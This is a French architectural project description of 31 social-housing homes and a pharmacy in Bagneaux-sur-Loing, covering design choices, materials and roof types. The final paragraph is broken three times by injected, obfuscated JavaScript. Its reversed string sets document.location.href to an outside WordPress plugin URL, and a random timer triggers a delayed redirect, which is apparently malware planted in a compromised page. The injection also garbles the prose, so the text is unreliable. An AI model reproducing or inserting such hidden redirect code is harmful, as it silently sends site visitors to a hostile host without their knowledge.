CONSTRUCTION DE 31 LOGEMENTS SOCIAUX INDIVIDUELS ET UNE PHARMACIE A BAGNEAUX-SUR-LOING

Ce projet concerne la démolition de 16 pavillons & la construction de 31logements en locatif social individuel et d’une pharmacie. Il y aura des maisons en bandes ou isolées.
Les maisons ont été conçues de manière à conserver l’image archétypale de la maison traditionnelle, transcrit dans un langage contemporain aux lignes sobres ; sans omettre pour autant le souci du détail, qui est un élément important dans la perception rapprochée et l’appropriation affective des lieux et du bâti : il sera marqué par des éléments tels que marquises d’entrée, jeux de mise en œuvre de la brique pour certains encadrements et linteaux, traitement de pieds de façades, etc.
Le choix des volumétries et des matériaux fait écho à ceux de l’opération quartier Fromonceau (secteur 3) dans une optique d’harmonisation à l’échelle du quartier en devenir. Les percements sont généreux pour les séjours orientés favorablement ; chaque fois que c’est possible, la sous?pente des toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toitures a été mise à profit pour le volume des séjours. Les hauteurs du bâti jouent entre les R et les R+1, avec des toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toitures en ardoises à deux pentes, majoritaires, et quelques parties de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toitures terrasses gravillonnées. Enfin, les T2 ainsi que certains T3 sont de plain?pied, les autres typologies comportant un étage.
Haut de page